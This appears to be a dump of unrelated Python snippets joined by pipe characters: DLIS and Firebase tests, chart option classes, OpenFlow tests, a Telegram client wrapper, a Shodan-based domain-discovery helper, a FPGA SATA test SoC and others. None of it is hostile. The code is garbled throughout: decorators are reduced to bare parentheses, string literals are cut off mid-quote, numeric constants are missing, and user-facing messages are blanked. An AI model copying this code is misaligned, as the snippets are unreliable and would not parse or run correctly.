.parametrize('settype', ['PARAMETER', 'COMPUTATION'])
def test_values_infer_simple(tmpdir, merge_files_oneLR, settype):
path = os.path.join(str(tmpdir), 'values-infer-simple.dlis')
content = [*assemble_set(settype), 'data/chap4-7/eflr/ndattrs/objattr/2.dlis.part', 'data/chap4-7/eflr/ndattrs/objattr/empty-INT.dlis.part', 'data/chap4-7/eflr/ndattrs/objattr/empty-OBNAME.dlis.part']
merge_files_oneLR(path, content)
with dlis.load(path) as (f, *_):
obj = f.object(settype, 'OBJECT', 10, 0)
assert (obj.values[0] == 2) |
def test_update_tenant():
tenant = tenant_mgt.create_tenant(display_name='py-update-test', allow_password_sign_up=True, enable_email_link_sign_in=True)
try:
tenant = tenant_mgt.update_tenant(tenant.tenant_id, display_name='updated-py-tenant', allow_password_sign_up=False, enable_email_link_sign_in=False)
assert isinstance(tenant, tenant_mgt.Tenant)
assert (tenant.tenant_id == tenant.tenant_id)
assert (tenant.display_name == 'updated-py-tenant')
assert (tenant.allow_password_sign_up is False)
assert (tenant.enable_email_link_sign_in is False)
finally:
tenant_mgt.delete_tenant(tenant.tenant_id) |
def repeat_with_success_at_least(times, min_success):
assert (times >= min_success)
def _repeat_with_success_at_least(f):
(f)
def wrapper(*args, **kwargs):
assert (len(args) > 0)
instance = args[0]
assert isinstance(instance, unittest.TestCase)
success_counter = 0
failure_counter = 0
results = []
def fail():
msg = '\nFail: {0}, Success: {1}'.format(failure_counter, success_counter)
if (len(results) > 0):
first = results[0]
errs = (first.failures + first.errors)
if (len(errs) > 0):
err_msg = '\n'.join((fail[1] for fail in errs))
msg += ('\n\nThe first error message:\n' + err_msg)
instance.fail(msg)
for _ in six.moves.range(times):
suite = unittest.TestSuite()
ins = type(instance)(instance._testMethodName)
suite.addTest(unittest.FunctionTestCase((lambda : f(ins, *args[1:], **kwargs)), setUp=ins.setUp, tearDown=ins.tearDown))
result = QuietTestRunner().run(suite)
if result.wasSuccessful():
success_counter += 1
else:
results.append(result)
failure_counter += 1
if (success_counter >= min_success):
instance.assertTrue(True)
return
if (failure_counter > (times - min_success)):
fail()
return
fail()
return wrapper
return _repeat_with_success_at_least |
class Database():
def lookup_parts(self):
raise NotImplementedError('')
def lookup_dicts(self, *args, **kwargs):
raise NotImplementedError('')
def count(self, request):
raise NotImplementedError('')
def load_iterator(self, iterator):
raise NotImplementedError('')
def sel(self, selection):
raise NotImplementedError('')
def order_by(self, order):
raise NotImplementedError('')
def already_loaded(self, path_or_url, owner):
return False |
class OptionSeriesHeatmapDataAccessibility(Options):
def description(self):
return self._config_get(None)
def description(self, text: str):
self._config(text, js_type=False)
def enabled(self):
return self._config_get(None)
def enabled(self, flag: bool):
self._config(flag, js_type=False) |
class TestNXActionPopQueue(unittest.TestCase):
type_ = {'buf': b'\xff\xff', 'val': ofproto.OFPAT_VENDOR}
len_ = {'buf': b'\x00\x10', 'val': ofproto.NX_ACTION_SET_TUNNEL_SIZE}
vendor = {'buf': b'\x00\x00# ', 'val': ofproto_common.NX_EXPERIMENTER_ID}
subtype = {'buf': b'\x00\x05', 'val': ofproto.NXAST_POP_QUEUE}
zfill = (b'\x00' * 6)
buf = ((((type_['buf'] + len_['buf']) + vendor['buf']) + subtype['buf']) + zfill)
c = NXActionPopQueue()
def setUp(self):
pass
def tearDown(self):
pass
def test_init(self):
eq_(self.subtype['val'], self.c.subtype)
def test_parser(self):
res = OFPActionVendor.parser(self.buf, 0)
eq_(self.type_['val'], res.type)
eq_(self.len_['val'], res.len)
eq_(self.subtype['val'], res.subtype)
def test_serialize(self):
buf = bytearray()
self.c.serialize(buf, 0)
fmt = ofproto.NX_ACTION_POP_QUEUE_PACK_STR
res = struct.unpack(fmt, six.binary_type(buf))
eq_(self.type_['val'], res[0])
eq_(self.len_['val'], res[1])
eq_(self.vendor['val'], res[2])
eq_(self.subtype['val'], res[3]) |
('cuda.perm102_bmm_rcr.gen_profiler')
def gen_profiler(func_attrs, workdir, profiler_filename, dim_info_dict):
args_parser = bmm_common.ARGS_PARSER_TEMPLATE.render(a_dims=['M', 'B', 'K'], b_dims=['B', 'N', 'K'], c_dims=['M', 'B', 'N'])
mm_info = _get_default_problem_info(alpha_value=func_attrs.get('alpha', 1))
problem_args = bmm_common.PROBLEM_ARGS_TEMPLATE.render(mm_info=mm_info)
problem_args_cutlass_3x = bmm_common.PROBLEM_ARGS_TEMPLATE_CUTLASS_3X.render(mm_info=bmm_common.add_elem_types_to_mm_info(mm_info=mm_info, func_attrs=func_attrs))
return bmm_common.gen_profiler(func_attrs=func_attrs, workdir=workdir, profiler_filename=profiler_filename, dim_info_dict=dim_info_dict, src_template=common.SRC_TEMPLATE, problem_args=problem_args, problem_args_cutlass_3x=problem_args_cutlass_3x, args_parser=args_parser) |
class ConversionActionQuery(AbstractObject):
def __init__(self, api=None):
super(ConversionActionQuery, self).__init__()
self._isConversionActionQuery = True
self._api = api
class Field(AbstractObject.Field):
field_action_type = 'action.type'
application = 'application'
conversion_id = 'conversion_id'
creative = 'creative'
dataset = 'dataset'
event = 'event'
field_event_creator = 'event.creator'
event_type = 'event_type'
fb_pixel = 'fb_pixel'
fb_pixel_event = 'fb_pixel_event'
leadgen = 'leadgen'
object = 'object'
field_object_domain = 'object.domain'
offer = 'offer'
field_offer_creator = 'offer.creator'
offsite_pixel = 'offsite_pixel'
page = 'page'
field_page_parent = 'page.parent'
post = 'post'
field_post_object = 'post.object'
field_post_object_wall = 'post.object.wall'
field_post_wall = 'post.wall'
question = 'question'
field_question_creator = 'question.creator'
response = 'response'
subtype = 'subtype'
_field_types = {'action.type': 'list<Object>', 'application': 'list<Object>', 'conversion_id': 'list<string>', 'creative': 'list<Object>', 'dataset': 'list<string>', 'event': 'list<string>', 'event.creator': 'list<string>', 'event_type': 'list<string>', 'fb_pixel': 'list<string>', 'fb_pixel_event': 'list<string>', 'leadgen': 'list<string>', 'object': 'list<string>', 'object.domain': 'list<string>', 'offer': 'list<string>', 'offer.creator': 'list<string>', 'offsite_pixel': 'list<string>', 'page': 'list<string>', 'page.parent': 'list<string>', 'post': 'list<string>', 'post.object': 'list<string>', 'post.object.wall': 'list<string>', 'post.wall': 'list<string>', 'question': 'list<string>', 'question.creator': 'list<string>', 'response': 'list<string>', 'subtype': 'list<string>'}
def _get_field_enum_info(cls):
field_enum_info = {}
return field_enum_info |
class ResultsCacheBase(object):
_instance = None
def __new__(cls, *args, **kwargs):
if (not cls._instance):
cls._instance = super(ResultsCacheBase, cls).__new__(cls, *args, **kwargs)
return cls._instance
def get(self, key):
pass
def set(self, key, value):
pass |
class OptionSeriesSolidgaugeOnpointPosition(Options):
def offsetX(self):
return self._config_get(None)
def offsetX(self, num: float):
self._config(num, js_type=False)
def offsetY(self):
return self._config_get(None)
def offsetY(self, num: float):
self._config(num, js_type=False)
def x(self):
return self._config_get(None)
def x(self, num: float):
self._config(num, js_type=False)
def y(self):
return self._config_get(None)
def y(self, num: float):
self._config(num, js_type=False) |
def test_attendee_registered(db, client, jwt, user):
user.is_super_admin = True
event = EventFactoryBasic()
microlocation = MicrolocationSubFactory(event=event)
ticket = TicketSubFactory(event=event)
station = StationSubFactory(event=event, microlocation=microlocation, station_type='registration')
session = SessionSubFactory(event=event, microlocation=microlocation)
attendee = AttendeeSubFactory(event=event, ticket=ticket)
db.session.commit()
data = json.dumps({'data': {'type': 'user_check_in', 'attributes': {}, 'relationships': {'station': {'data': {'id': str(station.id), 'type': 'station'}}, 'session': {'data': {'id': str(session.id), 'type': 'session'}}, 'ticket_holder': {'data': {'id': str(attendee.id), 'type': 'attendee'}}}}})
client.post('/v1/user-check-in', content_type='application/vnd.api+json', headers=jwt, data=data)
data = {'event_id': event.id, 'attendee_id': attendee.id}
response = client.get('/v1/states', content_type='application/json', headers=jwt, query_string=data)
assert (response.status_code == 200)
assert (json.loads(response.data)['is_registered'] is True) |
def process_stream_frame(source_face: Face, temp_frame: Frame) -> Frame:
for frame_processor_module in get_frame_processors_modules(facefusion.globals.frame_processors):
if frame_processor_module.pre_process('stream'):
temp_frame = frame_processor_module.process_frame(source_face, None, temp_frame)
return temp_frame |
def fqdns_from_weblinks(hostname, domains, timeout=5):
fqdns = set()
addrs = dnsx.resolve(hostname)
if (not addrs):
return fqdns
addr = addrs[0]
shodan_result = shodan_get_result(addr)
if (not shodan_result):
return fqdns
for port in shodan_result['data']:
if (' not in port):
continue
if ('ssl' in port):
scheme = '
else:
scheme = '
url = '{}://{}:{}'.format(scheme, hostname, port['port'])
logging.info('connecting to {}'.format(url))
links = web_links(url)
for link in links:
tld = tldextract.extract(link)
domain = '{}.{}'.format(tld.domain, tld.suffix)
if (domain in domains):
if tld.subdomain:
fqdns.add('{}.{}.{}'.format(tld.subdomain, tld.domain, tld.suffix))
return fqdns |
class Client(pyrogram.Client):
def __init__(self, *args, **kw):
super().__init__(*args, **kw)
self.cache = Cache()
self.dispatcher = Dispatcher(self)
async def authorize(self):
if self.bot_token:
return (await self.sign_in_bot(self.bot_token))
retry = False
while True:
try:
sent_code = (await self.send_code(self.phone_number))
code_target = {SentCodeType.APP: ' Telegram ', SentCodeType.SMS: '', SentCodeType.CALL: '', SentCodeType.FLASH_CALL: '', SentCodeType.FRAGMENT_SMS: ' Fragment ', SentCodeType.EMAIL_CODE: ''}
if (not self.phone_code):
if retry:
msg = f', "{self.phone_number}" ()'
else:
msg = f'{code_target[sent_code.type]} "{self.phone_number}" ()'
self.phone_code = Prompt.ask(((' ' * 23) + msg), console=var.console)
signed_in = (await self.sign_in(self.phone_number, sent_code.phone_code_hash, self.phone_code))
except (CodeInvalid, PhoneCodeInvalid):
self.phone_code = None
retry = True
except SessionPasswordNeeded:
retry = False
while True:
if (not self.password):
if retry:
msg = f', "{self.phone_number}" (, )'
else:
msg = f' "{self.phone_number}" (, )'
self.password = Prompt.ask(((' ' * 23) + msg), password=True, console=var.console)
try:
return (await self.check_password(self.password))
except BadRequest:
self.password = None
retry = True
else:
break
if isinstance(signed_in, types.User):
return signed_in
else:
raise BadRequest('')
def add_handler(self, handler: Handler, group: int=0):
if isinstance(handler, DisconnectHandler):
self.disconnect_handler = handler.callback
async def dummy():
pass
return asyncio.ensure_future(dummy())
else:
return self.dispatcher.add_handler(handler, group)
def remove_handler(self, handler: Handler, group: int=0):
if isinstance(handler, DisconnectHandler):
self.disconnect_handler = None
async def dummy():
pass
return asyncio.ensure_future(dummy())
else:
return self.dispatcher.remove_handler(handler, group)
async def get_dialogs(self, limit: int=0, exclude_pinned=None, folder_id=None) -> Optional[AsyncGenerator[('types.Dialog', None)]]:
cache_id = f'dialogs_{self.phone_number}_{folder_id}_{(1 if exclude_pinned else 0)}'
((offset_id, offset_date, offset_peer), cache) = (await self.cache.get(cache_id, ((0, 0, raw.types.InputPeerEmpty()), [])))
current = 0
total = (limit or ((1 << 31) - 1))
limit = min(100, total)
for c in cache:
(yield c)
current += 1
if (current >= total):
return
while True:
r = (await self.invoke(raw.functions.messages.GetDialogs(offset_date=offset_date, offset_id=offset_id, offset_peer=offset_peer, limit=limit, hash=0, exclude_pinned=exclude_pinned, folder_id=folder_id), sleep_threshold=60))
users = {i.id: i for i in r.users}
chats = {i.id: i for i in r.chats}
messages = {}
for message in r.messages:
if isinstance(message, raw.types.MessageEmpty):
continue
chat_id = utils.get_peer_id(message.peer_id)
messages[chat_id] = (await types.Message._parse(self, message, users, chats))
dialogs = []
for dialog in r.dialogs:
if (not isinstance(dialog, raw.types.Dialog)):
continue
dialogs.append(types.Dialog._parse(self, dialog, messages, users, chats))
if (not dialogs):
return
last = dialogs[(- 1)]
offset_id = last.top_message.id
offset_date = utils.datetime_to_timestamp(last.top_message.date)
offset_peer = (await self.resolve_peer(last.chat.id))
(_, cache) = (await self.cache.get(cache_id, ((0, 0, raw.types.InputPeerEmpty()), [])))
(await self.cache.set(cache_id, ((offset_id, offset_date, offset_peer), (cache + dialogs)), ttl=120))
for dialog in dialogs:
(yield dialog)
current += 1
if (current >= total):
return
async def catch_reply(self, chat_id: Union[(int, str)], outgoing=False):
async def handler_func(client, message, future: asyncio.Future):
future.set_result(message)
future = asyncio.Future()
filter = filters.chat(chat_id)
if (not outgoing):
filter = (filter & (~ filters.outgoing))
handler = MessageHandler(async_partial(handler_func, future=future), filter)
(await self.add_handler(handler, group=0))
try:
(yield future)
finally:
self.remove_handler(handler, group=0)
async def wait_reply(self, chat_id: Union[(int, str)], send: str=None, timeout: float=10, outgoing=False):
async with self.catch_reply(chat_id=chat_id, outgoing=outgoing) as f:
if send:
(await self.send_message(chat_id, send))
msg: types.Message = (await asyncio.wait_for(f, timeout))
return msg
async def mute_chat(self, chat_id: Union[(int, str)], until: Union[(int, datetime)]):
if isinstance(until, datetime):
until = until.timestamp()
return (await self.invoke(raw.functions.account.UpdateNotifySettings(peer=raw.types.InputNotifyPeer(peer=(await self.resolve_peer(chat_id))), settings=raw.types.InputPeerNotifySettings(show_previews=False, mute_until=int(until)))))
async def handle_updates(self, updates):
self.last_update_time = datetime.now()
if isinstance(updates, (raw.types.Updates, raw.types.UpdatesCombined)):
is_min = any(((await self.fetch_peers(updates.users)), (await self.fetch_peers(updates.chats))))
users = {u.id: u for u in updates.users}
chats = {c.id: c for c in updates.chats}
for update in updates.updates:
channel_id = (getattr(getattr(getattr(update, 'message', None), 'peer_id', None), 'channel_id', None) or getattr(update, 'channel_id', None))
pts = getattr(update, 'pts', None)
pts_count = getattr(update, 'pts_count', None)
if (isinstance(update, raw.types.UpdateNewChannelMessage) and is_min):
message = update.message
if (not isinstance(message, raw.types.MessageEmpty)):
try:
diff = (await self.invoke(raw.functions.updates.GetChannelDifference(channel=(await self.resolve_peer(utils.get_channel_id(channel_id))), filter=raw.types.ChannelMessagesFilter(ranges=[raw.types.MessageRange(min_id=update.message.id, max_id=update.message.id)]), pts=(pts - pts_count), limit=pts)))
except ChannelPrivate:
pass
except OSError:
logger.info(', .')
else:
if (not isinstance(diff, raw.types.updates.ChannelDifferenceEmpty)):
users.update({u.id: u for u in diff.users})
chats.update({c.id: c for c in diff.chats})
self.dispatcher.updates_queue.put_nowait((update, users, chats))
elif isinstance(updates, (raw.types.UpdateShortMessage, raw.types.UpdateShortChatMessage)):
diff = (await self.invoke(raw.functions.updates.GetDifference(pts=(updates.pts - updates.pts_count), date=updates.date, qts=(- 1))))
if diff.new_messages:
self.dispatcher.updates_queue.put_nowait((raw.types.UpdateNewMessage(message=diff.new_messages[0], pts=updates.pts, pts_count=updates.pts_count), {u.id: u for u in diff.users}, {c.id: c for c in diff.chats}))
elif diff.other_updates:
self.dispatcher.updates_queue.put_nowait((diff.other_updates[0], {}, {}))
elif isinstance(updates, raw.types.UpdateShort):
self.dispatcher.updates_queue.put_nowait((updates.update, {}, {}))
elif isinstance(updates, raw.types.UpdatesTooLong):
logger.info(updates) |
_cache()
def flowmod(cookie, command, table_id, priority, out_port, out_group, match_fields, inst, hard_timeout, idle_timeout, flags=0):
return parser.OFPFlowMod(datapath=None, cookie=cookie, command=command, table_id=table_id, priority=priority, out_port=out_port, out_group=out_group, match=match_fields, instructions=inst, hard_timeout=hard_timeout, idle_timeout=idle_timeout, flags=flags) |
class _DcBoundMixin(models.Model):
dc_bound = models.ForeignKey('vms.Dc', related_name='%(class)s_dc_bound_set', null=True, blank=True, default=None, on_delete=models.SET_NULL)
class Meta():
app_label = 'vms'
abstract = True
def dc_bound_bool(self):
return bool(self.dc_bound)
_bound_bool.setter
def dc_bound_bool(self, value):
self.dc_bound = value |
class DataEnum():
dflt = None
js_conversion = False
def __init__(self, component, value: Any=None):
(self.page, self.__value) = (component.page, (value or self.dflt))
self.component = component
def set(self, value: Union[(str, primitives.JsDataModel)]=None):
if (value is None):
value = sys._getframe().f_back.f_code.co_name
if self.js_conversion:
value = (value.toStr() if hasattr(value, 'toStr') else JsUtils.jsConvertData(value, None).toStr())
self.__value = value
def custom(self, value: str):
self.__value = value
def __str__(self):
return self.__value |
def get_ice_breaker_chain() -> LLMChain:
ice_breaker_template = '\n given the information about a person from linkedin {information}, and twitter posts {twitter_posts} I want you to create:\n 2 creative Ice breakers with them that are derived from their activity on Linkedin and twitter, preferably on latest tweets\n \n{format_instructions}\n '
ice_breaker_prompt_template = PromptTemplate(input_variables=['information', 'twitter_posts'], template=ice_breaker_template, partial_variables={'format_instructions': ice_breaker_parser.get_format_instructions()})
return LLMChain(llm=llm_creative, prompt=ice_breaker_prompt_template) |
def AutocompleteFilterFactory(title, base_parameter_name, viewname='', use_pk_exact=False, label_by=str):
class NewMetaFilter(type(AutocompleteFilter)):
def __new__(cls, name, bases, attrs):
super_new = super().__new__(cls, name, bases, attrs)
super_new.use_pk_exact = use_pk_exact
field_names = str(base_parameter_name).split(LOOKUP_SEP)
super_new.field_name = field_names[(- 1)]
super_new.parameter_name = base_parameter_name
if ((len(field_names) <= 1) and super_new.use_pk_exact):
super_new.parameter_name += '__{}__exact'.format(super_new.field_pk)
return super_new
class NewFilter(AutocompleteFilter, metaclass=NewMetaFilter):
def __init__(self, request, params, model, model_admin):
self.rel_model = _get_rel_model(model, base_parameter_name)
self.form_field = generate_choice_field(label_by)
super().__init__(request, params, model, model_admin)
self.title = title
def get_autocomplete_url(self, request, model_admin):
if (viewname == ''):
return super().get_autocomplete_url(request, model_admin)
else:
return reverse(viewname)
return NewFilter |
class WallPlaneHolder(_WallMountedBox):
def __init__(self) -> None:
super().__init__()
self.argparser.add_argument('--width', action='store', type=float, default=80, help='width of the plane')
self.argparser.add_argument('--length', action='store', type=float, default=250, help='length of the plane')
self.argparser.add_argument('--hold_length', action='store', type=float, default=30, help='length of the part holding the plane over the front')
self.argparser.add_argument('--height', action='store', type=float, default=80, help='height of the front of plane')
def side(self):
(l, w, h) = (self.length, self.width, self.height)
hl = self.hold_length
t = self.thickness
self.fingerHolesAt((1.5 * t), (2 * t), (0.25 * l), 90)
self.fingerHolesAt((1.5 * t), ((2 * t) + (0.75 * l)), (0.25 * l), 90)
self.fingerHolesAt(((2.5 * t) + h), (((2 * t) + l) - hl), hl, 90)
self.fingerHolesAt((2 * t), (1.5 * t), (h + (2 * t)), 0)
def render(self):
self.generateWallEdges()
(l, w, h) = (self.length, self.width, self.height)
t = self.thickness
self.rectangularWall((h + (4 * t)), (l + (2 * t)), 'eeea', callback=[self.side], move='right')
self.rectangularWall((h + (4 * t)), (l + (2 * t)), 'eeea', callback=[self.side], move='right')
self.rectangularWall(w, (h + (2 * t)), 'efFf', move='up')
self.rectangularWall(w, (0.25 * l), 'ffef', move='up')
self.rectangularWall(w, (0.25 * l), 'efef', move='up')
self.rectangularWall(w, self.hold_length, 'efef', move='up') |
class SATATestSoC(SoCMini):
def __init__(self, platform, connector='fmc', gen='gen3', with_global_analyzer=False, with_sector2mem_analyzer=False, with_mem2sector_analyzer=False):
assert (connector in ['fmc', 'sfp', 'pcie'])
assert (gen in ['gen1', 'gen2', 'gen3'])
sys_clk_freq = int(.0)
sata_clk_freq = {'gen1': .0, 'gen2': .0, 'gen3': .0}[gen]
self.submodules.crg = _CRG(platform, sys_clk_freq)
SoCMini.__init__(self, platform, sys_clk_freq, ident='LiteSATA bench on KC705')
self.add_uartbone()
sata_refclk = None
if (connector != 'fmc'):
self.clock_domains.cd_sata_refclk = ClockDomain()
self.crg.pll.create_clkout(self.cd_sata_refclk, .0)
sata_refclk = ClockSignal('sata_refclk')
platform.add_platform_command('set_property SEVERITY {{Warning}} [get_drc_checks REQP-52]')
self.submodules.sata_phy = LiteSATAPHY(platform.device, refclk=sata_refclk, pads=platform.request((connector + '2sata')), gen=gen, clk_freq=sys_clk_freq, data_width=16)
self.submodules.sata_core = LiteSATACore(self.sata_phy)
self.submodules.sata_crossbar = LiteSATACrossbar(self.sata_core)
self.submodules.sata_bist = LiteSATABIST(self.sata_crossbar, with_csr=True)
bus = wishbone.Interface(data_width=32, adr_width=32)
self.submodules.sata_sector2mem = LiteSATASector2MemDMA(self.sata_crossbar.get_port(), bus)
self.bus.add_master('sata_sector2mem', master=bus)
bus = wishbone.Interface(data_width=32, adr_width=32)
self.submodules.sata_mem2sector = LiteSATAMem2SectorDMA(bus, self.sata_crossbar.get_port())
self.bus.add_master('sata_mem2sector', master=bus)
platform.add_period_constraint(self.sata_phy.crg.cd_sata_tx.clk, (.0 / sata_clk_freq))
platform.add_period_constraint(self.sata_phy.crg.cd_sata_rx.clk, (.0 / sata_clk_freq))
self.platform.add_false_path_constraints(self.crg.cd_sys.clk, self.sata_phy.crg.cd_sata_tx.clk, self.sata_phy.crg.cd_sata_rx.clk)
sys_counter = Signal(32)
self.sync.sys += sys_counter.eq((sys_counter + 1))
self.comb += platform.request('user_led', 0).eq(sys_counter[26])
tx_counter = Signal(32)
self.sync.sata_tx += tx_counter.eq((tx_counter + 1))
self.comb += platform.request('user_led', 1).eq(tx_counter[26])
rx_counter = Signal(32)
self.sync.sata_rx += rx_counter.eq((rx_counter + 1))
self.comb += platform.request('user_led', 2).eq(rx_counter[26])
self.comb += platform.request('user_led', 3).eq(self.sata_phy.ctrl.ready)
if with_global_analyzer:
analyzer_signals = [self.sata_phy.phy.tx_init.fsm, self.sata_phy.phy.rx_init.fsm, self.sata_phy.ctrl.fsm, self.sata_phy.ctrl.ready, self.sata_phy.source, self.sata_phy.sink, self.sata_core.command.sink, self.sata_core.command.source, self.sata_core.link.rx.fsm, self.sata_core.link.tx.fsm, self.sata_core.transport.rx.fsm, self.sata_core.transport.tx.fsm, self.sata_core.command.rx.fsm, self.sata_core.command.tx.fsm]
self.submodules.global_analyzer = LiteScopeAnalyzer(analyzer_signals, 512, csr_csv='global_analyzer.csv')
if with_sector2mem_analyzer:
analyzer_signals = [self.sata_sector2mem.start.re, self.sata_sector2mem.fsm, self.sata_sector2mem.port.sink, self.sata_sector2mem.port.source, self.sata_sector2mem.bus]
self.submodules.sector2mem_analyzer = LiteScopeAnalyzer(analyzer_signals, 2048, csr_csv='sector2mem_analyzer.csv')
if with_mem2sector_analyzer:
analyzer_signals = [self.sata_mem2sector.start.re, self.sata_mem2sector.fsm, self.sata_mem2sector.port.sink, self.sata_mem2sector.port.source, self.sata_mem2sector.bus]
self.submodules.mem2sector_analyzer = LiteScopeAnalyzer(analyzer_signals, 2048, csr_csv='mem2sector_analyzer.csv') |
class QuantilesTracker():
def __init__(self):
self._samples: List = []
def update(self, val: float) -> None:
self._samples.append(val)
def quantile(self, p) -> float:
if (len(self._samples) == 0):
return float('Inf')
return np.quantile(self._samples, p)
def median_val(self) -> float:
return self.quantile(0.5)
def lower_quartile_val(self) -> float:
return self.quantile(0.25)
def upper_quartile_val(self) -> float:
return self.quantile(0.75) |
class TestShellHook(fake_filesystem_unittest.TestCase):
def setUp(self):
self.setUpPyfakefs()
self.original_dir = os.getcwd()
self.hook = ShellHook()
self.fs.create_dir(FAKEDIR)
def tearDown(self):
os.chdir(self.original_dir)
def test_cd_pre(self):
self.assertNotEqual(FAKEDIR, os.getcwd())
self.assertEqual(self.original_dir, os.getcwd())
self.hook.before({'before': ['cd {}'.format(FAKEDIR)]})
self.assertEqual(FAKEDIR, os.getcwd())
def test_cd_pre_reset(self):
self.assertNotEqual(FAKEDIR, os.getcwd())
self.assertEqual(self.original_dir, os.getcwd())
self.hook.before({'before': ['cd {}'.format(FAKEDIR)]})
self.assertEqual(FAKEDIR, os.getcwd())
self.hook.after({'before': ['cd {}'.format(FAKEDIR)]})
self.assertEqual(self.original_dir, os.getcwd())
('subprocess.check_call')
def test_pre_subprocess(self, check_call):
self.hook.before({'before': ['echo "hello world" extra']})
check_call.assert_called_once_with('echo "hello world" extra', shell=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
('subprocess.check_call')
def test_post_subprocess(self, check_call):
self.hook.after({'after': ['echo "hello world" extra']})
check_call.assert_called_once_with('echo "hello world" extra', shell=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
('subprocess.check_call')
def test_subprocess_fail(self, check_call):
with self.assertRaises(subprocess.CalledProcessError):
check_call.side_effect = subprocess.CalledProcessError(1, '')
self.hook.before({'before': ['true']}) |
def test_graph_with_switch_empty_nodes2(task):
task.graph.add_nodes_from((vertices := [BasicBlock(0, instructions=[IndirectBranch(variable('a'))]), BasicBlock(1, instructions=[Assignment(variable('a'), Constant(2))]), BasicBlock(2, instructions=[]), BasicBlock(3, instructions=[]), BasicBlock(4, instructions=[]), BasicBlock(5, instructions=[Assignment(variable('a'), Constant(3))]), BasicBlock(6, instructions=[Assignment(variable('a'), Constant(10))]), BasicBlock(7, instructions=[])]))
task.graph.add_edges_from([SwitchCase(vertices[0], vertices[1], cases=[Constant(1)]), SwitchCase(vertices[0], vertices[2], cases=[Constant(2)]), SwitchCase(vertices[0], vertices[3], cases=[Constant(3)]), SwitchCase(vertices[0], vertices[4], cases=[Constant(4)]), SwitchCase(vertices[0], vertices[6], cases=[Constant(5)]), UnconditionalEdge(vertices[3], vertices[5]), UnconditionalEdge(vertices[4], vertices[5]), UnconditionalEdge(vertices[1], vertices[7]), UnconditionalEdge(vertices[2], vertices[7]), UnconditionalEdge(vertices[5], vertices[7]), UnconditionalEdge(vertices[6], vertices[7])])
PatternIndependentRestructuring().run(task)
assert (isinstance((switch_node := task._ast.root), SwitchNode) and (len(switch_node.children) == 4))
assert (switch_node.expression == variable('a'))
assert (isinstance((case1 := switch_node.children[0]), CaseNode) and (case1.constant == Constant(1)) and (case1.break_case is True))
assert (isinstance((case2 := switch_node.children[1]), CaseNode) and (case2.constant == Constant(3)) and (case2.break_case is False))
assert (isinstance((case3 := switch_node.children[2]), CaseNode) and (case3.constant == Constant(4)) and (case3.break_case is True))
assert (isinstance((case4 := switch_node.children[3]), CaseNode) and (case4.constant == Constant(5)) and (case4.break_case is True))
assert (isinstance((code_node_1 := case1.child), CodeNode) and (code_node_1.instructions == vertices[1].instructions))
assert case2.child.is_empty_code_node
assert (isinstance((code_node_3 := case3.child), CodeNode) and (code_node_3.instructions == vertices[5].instructions))
assert (isinstance((code_node_4 := case4.child), CodeNode) and (code_node_4.instructions == vertices[6].instructions)) |
def to_prometheus_format(metrics: typing.Dict[(str, str)], prom_stati: typing.Sequence[typing.Tuple[(str, typing.Mapping[(str, typing.Union[(int, float, None)])])]]) -> typing.List[str]:
prom_str_list = []
for (metric_name, metric_desc) in metrics.items():
prom_str_list.append(f'# HELP {metric_name} {metric_desc}.')
prom_str_list.append(f'# TYPE {metric_name} gauge')
for (label_str, values) in prom_stati:
prom_str_list.append(('%s{%s} %s' % (metric_name, label_str, values[metric_name])))
return prom_str_list |
def test_fastq_scores_mean():
filename = 'tests/data/test.fastq'
expected_scores = [29, 30, 33, 33, 32, 36, 36, 36, 32, 36, 36, 37, 38, 38, 38, 38, 38, 37, 37, 38, 38, 38, 39, 38, 38, 39, 39, 38, 39, 38, 38, 38, 39, 39, 39, 39, 38, 39, 37, 38, 39, 38, 38, 39, 39, 38, 38, 39, 37, 38, 38, 34, 34, 38, 38, 33, 38, 37, 38, 38, 38, 38, 38, 34, 38, 38, 38, 38, 34, 38, 38, 37, 38, 38, 37, 38, 37, 28, 37, 38, 38, 38, 39, 38, 39, 39, 38, 39, 38, 34, 38, 39, 39, 38, 37, 38, 37, 38, 38, 38, 38, 39, 39, 38, 38, 33, 37, 36, 38, 38, 38, 38, 38, 37, 38, 36, 38, 34, 38, 38, 38, 38, 38, 38, 38, 38, 38, 37, 39, 36, 38, 39, 38, 39, 38, 39, 38, 38, 36, 36, 36, 36, 37, 36, 37, 38, 37, 32, 36, 35, 37, 36, 36, 36, 37, 37, 37, 38, 38, 38, 38, 38, 32, 35, 36, 36, 38, 35, 31, 32, 35, 34, 37, 37, 31, 33, 36, 36, 35, 30, 35, 37, 36, 36, 36, 36, 32, 34, 32, 36, 37, 37, 31, 37, 34, 34, 35, 32, 36, 36, 36, 31, 30, 36, 34, 37, 36, 32, 37, 36, 31, 33, 33, 36, 29, 34, 30, 31, 36, 36, 36, 37, 35, 31, 33, 25, 24, 31, 34, 30, 36, 37, 36, 31, 31, 33, 33, 36, 37, 36, 37, 30, 30, 35, 25, 28, 25, 29, 34, 25, 18]
read_length = 500
min_length = 0
stats = fastqe.fastqe.FastqStats().from_file(filename, read_length, min_length)
calculated_scores = stats.quality_scores_mean.letter_annotations['phred_quality']
assert (calculated_scores == expected_scores) |
class OptionPlotoptionsColumnrangeSonificationDefaultinstrumentoptionsMappingTremoloSpeed(Options):
def mapFunction(self):
return self._config_get(None)
def mapFunction(self, value: Any):
self._config(value, js_type=False)
def mapTo(self):
return self._config_get(None)
def mapTo(self, text: str):
self._config(text, js_type=False)
def max(self):
return self._config_get(None)
def max(self, num: float):
self._config(num, js_type=False)
def min(self):
return self._config_get(None)
def min(self, num: float):
self._config(num, js_type=False)
def within(self):
return self._config_get(None)
def within(self, value: Any):
self._config(value, js_type=False) |
class OptionSeriesStreamgraphSonificationDefaultinstrumentoptionsMappingLowpass(Options):
def frequency(self) -> 'OptionSeriesStreamgraphSonificationDefaultinstrumentoptionsMappingLowpassFrequency':
return self._config_sub_data('frequency', OptionSeriesStreamgraphSonificationDefaultinstrumentoptionsMappingLowpassFrequency)
def resonance(self) -> 'OptionSeriesStreamgraphSonificationDefaultinstrumentoptionsMappingLowpassResonance':
return self._config_sub_data('resonance', OptionSeriesStreamgraphSonificationDefaultinstrumentoptionsMappingLowpassResonance) |
class FauxPilotException(Exception):
def __init__(self, message: str, error_type: Optional[str]=None, param: Optional[str]=None, code: Optional[int]=None):
super().__init__(message)
self.message = message
self.error_type = error_type
self.param = param
self.code = code
def json(self):
return {'error': {'message': self.message, 'type': self.error_type, 'param': self.param, 'code': self.code}} |
class IApplicationWindow(IWindow):
icon = Image()
